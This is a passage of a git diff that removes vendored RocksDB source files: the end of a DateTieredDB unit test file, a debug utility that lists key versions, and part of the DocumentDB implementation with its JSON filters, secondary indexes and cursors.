-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // Delete keys when they are not obsolete
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Delete(wopts, kv.first));
-  }
-
-  // Key should not be found
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(DateTieredTest, KeyMayExistTest) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_TRUE(date_tiered_db_->KeyMayExist(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-}
-
-// Database open and close should not affect
-TEST_F(DateTieredTest, MultiOpen) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 4);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  CloseDateTieredDB();
-
-  Sleep(1);
-  OpenDateTieredDB(2, 2);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_OK(date_tiered_db_->Get(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-
-  Sleep(1);
-  // T=2, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-// If the key in Put() is obsolete, the data should not be written into database
-TEST_F(DateTieredTest, InsertObsoleteDate) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  Sleep(2);
-  // T=2, keys put into database are already obsolete
-  // Put data in database. Operations should not return OK
-  for (auto& kv : map_insert) {
-    auto s = date_tiered_db_->Put(wopts, kv.first, kv.second);
-    ASSERT_TRUE(s.IsInvalidArgument());
-  }
-
-  // Data should not be found in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-// Resets the timestamp of a set of kvs by updating them and checks that they
-// are not deleted according to the old timestamp
-TEST_F(DateTieredTest, ColumnFamilyCounts) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-  // Only default column family
-  ASSERT_EQ(1, GetColumnFamilyCount());
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // A time series column family is created
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  Sleep(2);
-  KVMap map_insert2;
-  MakeKVMap(kSampleSize_, &map_insert2);
-  for (auto& kv : map_insert2) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // Another time series column family is created
-  ASSERT_EQ(3, GetColumnFamilyCount());
-
-  Sleep(4);
-
-  // Data should not be found in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  // Explicitly drop obsolete column families
-  date_tiered_db_->DropObsoleteColumnFamilies();
-
-  // The first column family is deleted from database
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  CloseDateTieredDB();
-}
-
-// Puts a set of values and checks its presence using iterator during ttl
-TEST_F(DateTieredTest, IteratorLifeCycle) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-  Iterator* dbiter;
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  ASSERT_EQ(2, GetColumnFamilyCount());
-  // T=1, keys should still reside in database
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->SeekToFirst();
-  for (auto& kv : map_insert) {
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(kv.second));
-    dbiter->Next();
-  }
-  delete dbiter;
-
-  Sleep(4);
-  // T=5, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  // Explicitly drop obsolete column families
-  date_tiered_db_->DropObsoleteColumnFamilies();
-
-  // Only default column family
-  ASSERT_EQ(1, GetColumnFamilyCount());
-
-  // Empty iterator
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->Seek(map_insert.begin()->first);
-  ASSERT_FALSE(dbiter->Valid());
-  delete dbiter;
-
-  CloseDateTieredDB();
-}
-
-// Iterator should be able to merge data from multiple column families
-TEST_F(DateTieredTest, IteratorMerge) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  Iterator* dbiter;
-
-  // Put data in database
-  KVMap map_insert1;
-  MakeKVMap(kSampleSize_, &map_insert1);
-  for (auto& kv : map_insert1) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  Sleep(2);
-  // Put more data
-  KVMap map_insert2;
-  MakeKVMap(kSampleSize_, &map_insert2);
-  for (auto& kv : map_insert2) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // Multiple column families for time series data
-  ASSERT_EQ(3, GetColumnFamilyCount());
-
-  // Iterator should be able to merge data from different column families
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->SeekToFirst();
-  KVMap::iterator iter1 = map_insert1.begin();
-  KVMap::iterator iter2 = map_insert2.begin();
-  for (; iter1 != map_insert1.end() && iter2 != map_insert2.end();
-       iter1++, iter2++) {
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(iter1->second));
-    dbiter->Next();
-
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(iter2->second));
-    dbiter->Next();
-  }
-  delete dbiter;
-
-  CloseDateTieredDB();
-}
-
-}  //  namespace rocksdb
-
-// A black-box test for the DateTieredDB around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DateTieredDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/debug.cc b/thirdparty/rocksdb/utilities/debug.cc
deleted file mode 100644
index ce0b958..0000000
--- a/thirdparty/rocksdb/utilities/debug.cc
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/debug.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-
-Status GetAllKeyVersions(DB* db, Slice begin_key, Slice end_key,
-                         std::vector<KeyVersion>* key_versions) {
-  assert(key_versions != nullptr);
-  key_versions->clear();
-
-  DBImpl* idb = static_cast<DBImpl*>(db->GetRootDB());
-  auto icmp = InternalKeyComparator(idb->GetOptions().comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  Arena arena;
-  ScopedArenaIterator iter(idb->NewInternalIterator(&arena, &range_del_agg));
-
-  if (!begin_key.empty()) {
-    InternalKey ikey;
-    ikey.SetMaxPossibleForUserKey(begin_key);
-    iter->Seek(ikey.Encode());
-  } else {
-    iter->SeekToFirst();
-  }
-
-  for (; iter->Valid(); iter->Next()) {
-    ParsedInternalKey ikey;
-    if (!ParseInternalKey(iter->key(), &ikey)) {
-      return Status::Corruption("Internal Key [" + iter->key().ToString() +
-                                "] parse error!");
-    }
-
-    if (!end_key.empty() &&
-        icmp.user_comparator()->Compare(ikey.user_key, end_key) > 0) {
-      break;
-    }
-
-    key_versions->emplace_back(ikey.user_key.ToString() /* _user_key */,
-                               iter->value().ToString() /* _value */,
-                               ikey.sequence /* _sequence */,
-                               static_cast<int>(ikey.type) /* _type */);
-  }
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/document_db.cc b/thirdparty/rocksdb/utilities/document/document_db.cc
deleted file mode 100644
index f7b5b3b..0000000
--- a/thirdparty/rocksdb/utilities/document/document_db.cc
+++ /dev/null
@@ -1,1193 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/document_db.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/table.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/json_document.h"
-#include "util/coding.h"
-#include "util/mutexlock.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-// IMPORTANT NOTE: Secondary index column families should be very small and
-// generally fit in memory. Assume that accessing secondary index column
-// families is much faster than accessing primary index (data heap) column
-// family. Accessing a key (i.e. checking for existence) from a column family in
-// RocksDB is not much faster than accessing both key and value since they are
-// kept together and loaded from storage together.
-
-namespace {
-// < 0   <=>  lhs < rhs
-// == 0  <=>  lhs == rhs
-// > 0   <=>  lhs == rhs
-// TODO(icanadi) move this to JSONDocument?
-int DocumentCompare(const JSONDocument& lhs, const JSONDocument& rhs) {
-  assert(lhs.IsObject() == false && rhs.IsObject() == false &&
-         lhs.type() == rhs.type());
-
-  switch (lhs.type()) {
-    case JSONDocument::kNull:
-      return 0;
-    case JSONDocument::kBool:
-      return static_cast<int>(lhs.GetBool()) - static_cast<int>(rhs.GetBool());
-    case JSONDocument::kDouble: {
-      double res = lhs.GetDouble() - rhs.GetDouble();
-      return res == 0.0 ? 0 : (res < 0.0 ? -1 : 1);
-    }
-    case JSONDocument::kInt64: {
-      int64_t res = lhs.GetInt64() - rhs.GetInt64();
-      return res == 0 ? 0 : (res < 0 ? -1 : 1);
-    }
-    case JSONDocument::kString:
-      return Slice(lhs.GetString()).compare(Slice(rhs.GetString()));
-    default:
-      assert(false);
-  }
-  return 0;
-}
-}  // namespace
-
-class Filter {
- public:
-  // returns nullptr on parse failure
-  static Filter* ParseFilter(const JSONDocument& filter);
-
-  struct Interval {
-    JSONDocument upper_bound;
-    JSONDocument lower_bound;
-    bool upper_inclusive;
-    bool lower_inclusive;
-    Interval()
-        : upper_bound(),
-          lower_bound(),
-          upper_inclusive(false),
-          lower_inclusive(false) {}
-    Interval(const JSONDocument& ub, const JSONDocument& lb, bool ui, bool li)
-        : upper_bound(ub),
-          lower_bound(lb),
-          upper_inclusive(ui),
-          lower_inclusive(li) {
-    }
-
-    void UpdateUpperBound(const JSONDocument& ub, bool inclusive);
-    void UpdateLowerBound(const JSONDocument& lb, bool inclusive);
-  };
-
-  bool SatisfiesFilter(const JSONDocument& document) const;
-  const Interval* GetInterval(const std::string& field) const;
-
- private:
-  explicit Filter(const JSONDocument& filter) : filter_(filter.Copy()) {
-    assert(filter_.IsOwner());
-  }
-
-  // copied from the parameter
-  const JSONDocument filter_;
-  // constant after construction
-  std::unordered_map<std::string, Interval> intervals_;
-};
-
-void Filter::Interval::UpdateUpperBound(const JSONDocument& ub,
-                                        bool inclusive) {
-  bool update = upper_bound.IsNull();
-  if (!update) {
-    int cmp = DocumentCompare(upper_bound, ub);
-    update = (cmp > 0) || (cmp == 0 && !inclusive);
-  }
-  if (update) {
-    upper_bound = ub;
-    upper_inclusive = inclusive;
-  }
-}
-
-void Filter::Interval::UpdateLowerBound(const JSONDocument& lb,
-                                        bool inclusive) {
-  bool update = lower_bound.IsNull();
-  if (!update) {
-    int cmp = DocumentCompare(lower_bound, lb);
-    update = (cmp < 0) || (cmp == 0 && !inclusive);
-  }
-  if (update) {
-    lower_bound = lb;
-    lower_inclusive = inclusive;
-  }
-}
-
-Filter* Filter::ParseFilter(const JSONDocument& filter) {
-  if (filter.IsObject() == false) {
-    return nullptr;
-  }
-
-  std::unique_ptr<Filter> f(new Filter(filter));
-
-  for (const auto& items : f->filter_.Items()) {
-    if (items.first.size() && items.first[0] == '$') {
-      // fields starting with '$' are commands
-      continue;
-    }
-    assert(f->intervals_.find(items.first) == f->intervals_.end());
-    if (items.second.IsObject()) {
-      if (items.second.Count() == 0) {
-        // uhm...?
-        return nullptr;
-      }
-      Interval interval;
-      for (const auto& condition : items.second.Items()) {
-        if (condition.second.IsObject() || condition.second.IsArray()) {
-          // comparison operators not defined on objects. invalid array
-          return nullptr;
-        }
-        // comparison operators:
-        if (condition.first == "$gt") {
-          interval.UpdateLowerBound(condition.second, false);
-        } else if (condition.first == "$gte") {
-          interval.UpdateLowerBound(condition.second, true);
-        } else if (condition.first == "$lt") {
-          interval.UpdateUpperBound(condition.second, false);
-        } else if (condition.first == "$lte") {
-          interval.UpdateUpperBound(condition.second, true);
-        } else {
-          // TODO(icanadi) more logical operators
-          return nullptr;
-        }
-      }
-      f->intervals_.insert({items.first, interval});
-    } else {
-      // equality
-      f->intervals_.insert(
-          {items.first, Interval(items.second,
-                                 items.second, true, true)});
-    }
-  }
-
-  return f.release();
-}
-
-const Filter::Interval* Filter::GetInterval(const std::string& field) const {
-  auto itr = intervals_.find(field);
-  if (itr == intervals_.end()) {
-    return nullptr;
-  }
-  // we can do that since intervals_ is constant after construction
-  return &itr->second;
-}
-
-bool Filter::SatisfiesFilter(const JSONDocument& document) const {
-  for (const auto& interval : intervals_) {
-    if (!document.Contains(interval.first)) {
-      // doesn't have the value, doesn't satisfy the filter
-      // (we don't support null queries yet)
-      return false;
-    }
-    auto value = document[interval.first];
-    if (!interval.second.upper_bound.IsNull()) {
-      if (value.type() != interval.second.upper_bound.type()) {
-        // no cross-type queries yet
-        // TODO(icanadi) do this at least for numbers!
-        return false;
-      }
-      int cmp = DocumentCompare(interval.second.upper_bound, value);
-      if (cmp < 0 || (cmp == 0 && interval.second.upper_inclusive == false)) {
-        // bigger (or equal) than upper bound
-        return false;
-      }
-    }
-    if (!interval.second.lower_bound.IsNull()) {
-      if (value.type() != interval.second.lower_bound.type()) {
-        // no cross-type queries yet
-        return false;
-      }
-      int cmp = DocumentCompare(interval.second.lower_bound, value);
-      if (cmp > 0 || (cmp == 0 && interval.second.lower_inclusive == false)) {
-        // smaller (or equal) than the lower bound
-        return false;
-      }
-    }
-  }
-  return true;
-}
-
-class Index {
- public:
-  Index() = default;
-  virtual ~Index() {}
-
-  virtual const char* Name() const = 0;
-
-  // Functions that are executed during write time
-  // ---------------------------------------------
-  // GetIndexKey() generates a key that will be used to index document and
-  // returns the key though the second std::string* parameter
-  virtual void GetIndexKey(const JSONDocument& document,
-                           std::string* key) const = 0;
-  // Keys generated with GetIndexKey() will be compared using this comparator.
-  // It should be assumed that there will be a suffix added to the index key
-  // according to IndexKey implementation
-  virtual const Comparator* GetComparator() const = 0;
-
-  // Functions that are executed during query time
-  // ---------------------------------------------
-  enum Direction {
-    kForwards,
-    kBackwards,
-  };
-  // Returns true if this index can provide some optimization for satisfying
-  // filter. False otherwise
-  virtual bool UsefulIndex(const Filter& filter) const = 0;
-  // For every filter (assuming UsefulIndex()) there is a continuous interval of
-  // keys in the index that satisfy the index conditions. That interval can be
-  // three things:
-  // * [A, B]
-  // * [A, infinity>
-  // * <-infinity, B]
-  //
-  // Query engine that uses this Index for optimization will access the interval
-  // by first calling Position() and then iterating in the Direction (returned
-  // by Position()) while ShouldContinueLooking() is true.
-  // * For [A, B] interval Position() will Seek() to A and return kForwards.
-  // ShouldContinueLooking() will be true until the iterator value gets beyond B
-  // -- then it will return false
-  // * For [A, infinity> Position() will Seek() to A and return kForwards.
-  // ShouldContinueLooking() will always return true
-  // * For <-infinity, B] Position() will Seek() to B and return kBackwards.
-  // ShouldContinueLooking() will always return true (given that iterator is
-  // advanced by calling Prev())
-  virtual Direction Position(const Filter& filter,
-                             Iterator* iterator) const = 0;
-  virtual bool ShouldContinueLooking(const Filter& filter,
-                                     const Slice& secondary_key,
-                                     Direction direction) const = 0;
-
-  // Static function that is executed when Index is created
-  // ---------------------------------------------
-  // Create Index from user-supplied description. Return nullptr on parse
-  // failure.
-  static Index* CreateIndexFromDescription(const JSONDocument& description,
-                                           const std::string& name);
-
- private:
-  // No copying allowed
-  Index(const Index&);
-  void operator=(const Index&);
-};
-
-// Encoding helper function
-namespace {
-std::string InternalSecondaryIndexName(const std::string& user_name) {
-  return "index_" + user_name;
-}
-
-// Don't change these, they are persisted in secondary indexes
-enum JSONPrimitivesEncoding : char {
-  kNull = 0x1,
-  kBool = 0x2,
-  kDouble = 0x3,
-  kInt64 = 0x4,
-  kString = 0x5,
-};
-
-// encodes simple JSON members (meaning string, integer, etc)
-// the end result of this will be lexicographically compared to each other
-bool EncodeJSONPrimitive(const JSONDocument& json, std::string* dst) {
-  // TODO(icanadi) revise this at some point, have a custom comparator
-  switch (json.type()) {
-    case JSONDocument::kNull:
-      dst->push_back(kNull);
-      break;
-    case JSONDocument::kBool:
-      dst->push_back(kBool);
-      dst->push_back(static_cast<char>(json.GetBool()));
-      break;
-    case JSONDocument::kDouble:
-      dst->push_back(kDouble);
-      PutFixed64(dst, static_cast<uint64_t>(json.GetDouble()));
-      break;
-    case JSONDocument::kInt64:
-      dst->push_back(kInt64);
-      {
-        auto val = json.GetInt64();
-        dst->push_back((val < 0) ? '0' : '1');
-        PutFixed64(dst, static_cast<uint64_t>(val));
-      }
-      break;
-    case JSONDocument::kString:
-      dst->push_back(kString);
-      dst->append(json.GetString());
-      break;
-    default:
-      return false;
-  }
-  return true;
-}
-
-}  // namespace
-
-// format of the secondary key is:
-// <secondary_key><primary_key><offset_of_primary_key uint32_t>
-class IndexKey {
- public:
-  IndexKey() : ok_(false) {}
-  explicit IndexKey(const Slice& slice) {
-    if (slice.size() < sizeof(uint32_t)) {
-      ok_ = false;
-      return;
-    }
-    uint32_t primary_key_offset =
-        DecodeFixed32(slice.data() + slice.size() - sizeof(uint32_t));
-    if (primary_key_offset >= slice.size() - sizeof(uint32_t)) {
-      ok_ = false;
-      return;
-    }
-    parts_[0] = Slice(slice.data(), primary_key_offset);
-    parts_[1] = Slice(slice.data() + primary_key_offset,
-                      slice.size() - primary_key_offset - sizeof(uint32_t));
-    ok_ = true;
-  }
-  IndexKey(const Slice& secondary_key, const Slice& primary_key) : ok_(true) {
-    parts_[0] = secondary_key;
-    parts_[1] = primary_key;
-  }
-
-  SliceParts GetSliceParts() {
-    uint32_t primary_key_offset = static_cast<uint32_t>(parts_[0].size());
-    EncodeFixed32(primary_key_offset_buf_, primary_key_offset);
-    parts_[2] = Slice(primary_key_offset_buf_, sizeof(uint32_t));
-    return SliceParts(parts_, 3);
-  }
-
-  const Slice& GetPrimaryKey() const { return parts_[1]; }
-  const Slice& GetSecondaryKey() const { return parts_[0]; }
-
-  bool ok() const { return ok_; }
-
- private:
-  bool ok_;
-  // 0 -- secondary key
-  // 1 -- primary key
-  // 2 -- primary key offset
-  Slice parts_[3];
-  char primary_key_offset_buf_[sizeof(uint32_t)];
-};
-
-class SimpleSortedIndex : public Index {
- public:
-  SimpleSortedIndex(const std::string& field, const std::string& name)
-      : field_(field), name_(name) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual void GetIndexKey(const JSONDocument& document, std::string* key) const
-      override {
-    if (!document.Contains(field_)) {
-      if (!EncodeJSONPrimitive(JSONDocument(JSONDocument::kNull), key)) {
-        assert(false);
-      }
-    } else {
-      if (!EncodeJSONPrimitive(document[field_], key)) {
-        assert(false);
-      }
-    }
-  }
-  virtual const Comparator* GetComparator() const override {
-    return BytewiseComparator();
-  }
-
-  virtual bool UsefulIndex(const Filter& filter) const override {
-    return filter.GetInterval(field_) != nullptr;
-  }
-  // REQUIRES: UsefulIndex(filter) == true
-  virtual Direction Position(const Filter& filter,
-                             Iterator* iterator) const override {
-    auto interval = filter.GetInterval(field_);
-    assert(interval != nullptr);  // because index is useful
-    Direction direction;
-
-    const JSONDocument* limit;
-    if (!interval->lower_bound.IsNull()) {
-      limit = &(interval->lower_bound);
-      direction = kForwards;
-    } else {
-      limit = &(interval->upper_bound);
-      direction = kBackwards;
-    }
-
-    std::string encoded_limit;
-    if (!EncodeJSONPrimitive(*limit, &encoded_limit)) {
-      assert(false);
-    }
-    iterator->Seek(Slice(encoded_limit));
-
-    return direction;
-  }
-  // REQUIRES: UsefulIndex(filter) == true
-  virtual bool ShouldContinueLooking(
-      const Filter& filter, const Slice& secondary_key,
-      Index::Direction direction) const override {
-    auto interval = filter.GetInterval(field_);
-    assert(interval != nullptr);  // because index is useful
-    if (direction == kForwards) {
-      if (interval->upper_bound.IsNull()) {
-        // continue looking, no upper bound
-        return true;
-      }
-      std::string encoded_upper_bound;
-      if (!EncodeJSONPrimitive(interval->upper_bound, &encoded_upper_bound)) {
-        // uhm...?
-        // TODO(icanadi) store encoded upper and lower bounds in Filter*?
-        assert(false);
-      }
-      // TODO(icanadi) we need to somehow decode this and use DocumentCompare()
-      int compare = secondary_key.compare(Slice(encoded_upper_bound));
-      // if (current key is bigger than upper bound) OR (current key is equal to
-      // upper bound, but inclusive is false) THEN stop looking. otherwise,
-      // continue
-      return (compare > 0 ||
-              (compare == 0 && interval->upper_inclusive == false))
-                 ? false
-                 : true;
-    } else {
-      assert(direction == kBackwards);
-      if (interval->lower_bound.IsNull()) {
-        // continue looking, no lower bound
-        return true;
-      }
-      std::string encoded_lower_bound;
-      if (!EncodeJSONPrimitive(interval->lower_bound, &encoded_lower_bound)) {
-        // uhm...?
-        // TODO(icanadi) store encoded upper and lower bounds in Filter*?
-        assert(false);
-      }
-      // TODO(icanadi) we need to somehow decode this and use DocumentCompare()
-      int compare = secondary_key.compare(Slice(encoded_lower_bound));
-      // if (current key is smaller than lower bound) OR (current key is equal
-      // to lower bound, but inclusive is false) THEN stop looking. otherwise,
-      // continue
-      return (compare < 0 ||
-              (compare == 0 && interval->lower_inclusive == false))
-                 ? false
-                 : true;
-    }
-
-    assert(false);
-    // this is here just so compiler doesn't complain
-    return false;
-  }
-
- private:
-  std::string field_;
-  std::string name_;
-};
-
-Index* Index::CreateIndexFromDescription(const JSONDocument& description,
-                                         const std::string& name) {
-  if (!description.IsObject() || description.Count() != 1) {
-    // not supported yet
-    return nullptr;
-  }
-  const auto& field = *description.Items().begin();
-  if (field.second.IsInt64() == false || field.second.GetInt64() != 1) {
-    // not supported yet
-    return nullptr;
-  }
-  return new SimpleSortedIndex(field.first, name);
-}
-
-class CursorWithFilterIndexed : public Cursor {
- public:
-  CursorWithFilterIndexed(Iterator* primary_index_iter,
-                          Iterator* secondary_index_iter, const Index* index,
-                          const Filter* filter)
-      : primary_index_iter_(primary_index_iter),
-        secondary_index_iter_(secondary_index_iter),
-        index_(index),
-        filter_(filter),
-        valid_(true),
-        current_json_document_(nullptr) {
-    assert(filter_.get() != nullptr);
-    direction_ = index->Position(*filter_.get(), secondary_index_iter_.get());
-    UpdateIndexKey();
-    AdvanceUntilSatisfies();
-  }
-
-  virtual bool Valid() const override {
-    return valid_ && secondary_index_iter_->Valid();
-  }
-  virtual void Next() override {
-    assert(Valid());
-    Advance();
-    AdvanceUntilSatisfies();
-  }
-  // temporary object. copy it if you want to use it
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return *current_json_document_;
-  }
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    if (!primary_index_iter_->status().ok()) {
-      return primary_index_iter_->status();
-    }
-    return secondary_index_iter_->status();
-  }
-
- private:
-  void Advance() {
-    if (direction_ == Index::kForwards) {
-      secondary_index_iter_->Next();
-    } else {
-      secondary_index_iter_->Prev();
-    }
-    UpdateIndexKey();
-  }
-  void AdvanceUntilSatisfies() {
-    bool found = false;
-    while (secondary_index_iter_->Valid() &&
-           index_->ShouldContinueLooking(
-               *filter_.get(), index_key_.GetSecondaryKey(), direction_)) {
-      if (!UpdateJSONDocument()) {
-        // corruption happened
-        return;
-      }
-      if (filter_->SatisfiesFilter(*current_json_document_)) {
-        // we found satisfied!
-        found = true;
-        break;
-      } else {
-        // doesn't satisfy :(
-        Advance();
-      }
-    }
-    if (!found) {
-      valid_ = false;
-    }
-  }
-
-  bool UpdateJSONDocument() {
-    assert(secondary_index_iter_->Valid());
-    primary_index_iter_->Seek(index_key_.GetPrimaryKey());
-    if (!primary_index_iter_->Valid()) {
-      status_ = Status::Corruption(
-          "Inconsistency between primary and secondary index");
-      valid_ = false;
-      return false;
-    }
-    current_json_document_.reset(
-        JSONDocument::Deserialize(primary_index_iter_->value()));
-    assert(current_json_document_->IsOwner());
-    if (current_json_document_.get() == nullptr) {
-      status_ = Status::Corruption("JSON deserialization failed");
-      valid_ = false;
-      return false;
-    }
-    return true;
-  }
-  void UpdateIndexKey() {
-    if (secondary_index_iter_->Valid()) {
-      index_key_ = IndexKey(secondary_index_iter_->key());
-      if (!index_key_.ok()) {
-        status_ = Status::Corruption("Invalid index key");
-        valid_ = false;
-      }
-    }
-  }
-  std::unique_ptr<Iterator> primary_index_iter_;
-  std::unique_ptr<Iterator> secondary_index_iter_;
-  // we don't own index_
-  const Index* index_;
-  Index::Direction direction_;
-  std::unique_ptr<const Filter> filter_;
-  bool valid_;
-  IndexKey index_key_;
-  std::unique_ptr<JSONDocument> current_json_document_;
-  Status status_;
-};
-
-class CursorFromIterator : public Cursor {
- public:
-  explicit CursorFromIterator(Iterator* iter)
-      : iter_(iter), current_json_document_(nullptr) {
-    iter_->SeekToFirst();
-    UpdateCurrentJSON();
-  }
-
-  virtual bool Valid() const override { return status_.ok() && iter_->Valid(); }
-  virtual void Next() override {
-    iter_->Next();
-    UpdateCurrentJSON();
-  }
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return *current_json_document_;
-  };
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    return iter_->status();
-  }
-
-  // not part of public Cursor interface
-  Slice key() const { return iter_->key(); }
-
- private:
-  void UpdateCurrentJSON() {
-    if (Valid()) {
-      current_json_document_.reset(JSONDocument::Deserialize(iter_->value()));
-      if (current_json_document_.get() == nullptr) {
-        status_ = Status::Corruption("JSON deserialization failed");
-      }
-    }
-  }
-
-  Status status_;
-  std::unique_ptr<Iterator> iter_;
-  std::unique_ptr<JSONDocument> current_json_document_;
-};
-
-class CursorWithFilter : public Cursor {
- public:
-  CursorWithFilter(Cursor* base_cursor, const Filter* filter)
-      : base_cursor_(base_cursor), filter_(filter) {
-    assert(filter_.get() != nullptr);
-    SeekToNextSatisfies();
-  }
-  virtual bool Valid() const override { return base_cursor_->Valid(); }
-  virtual void Next() override {
-    assert(Valid());
-    base_cursor_->Next();
-    SeekToNextSatisfies();
-  }
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return base_cursor_->document();
-  }
-  virtual Status status() const override { return base_cursor_->status(); }
-
- private:
-  void SeekToNextSatisfies() {
-    for (; base_cursor_->Valid(); base_cursor_->Next()) {
-      if (filter_->SatisfiesFilter(base_cursor_->document())) {
-        break;
-      }
-    }
-  }
-  std::unique_ptr<Cursor> base_cursor_;
-  std::unique_ptr<const Filter> filter_;
-};
-
-class CursorError : public Cursor {
- public:
-  explicit CursorError(Status s) : s_(s) { assert(!s.ok()); }
-  virtual Status status() const override { return s_; }
-  virtual bool Valid() const override { return false; }
-  virtual void Next() override {}
-  virtual const JSONDocument& document() const override {
-    assert(false);
-    // compiler complains otherwise
-    return trash_;
-  }
-
- private:
-  Status s_;
-  JSONDocument trash_;
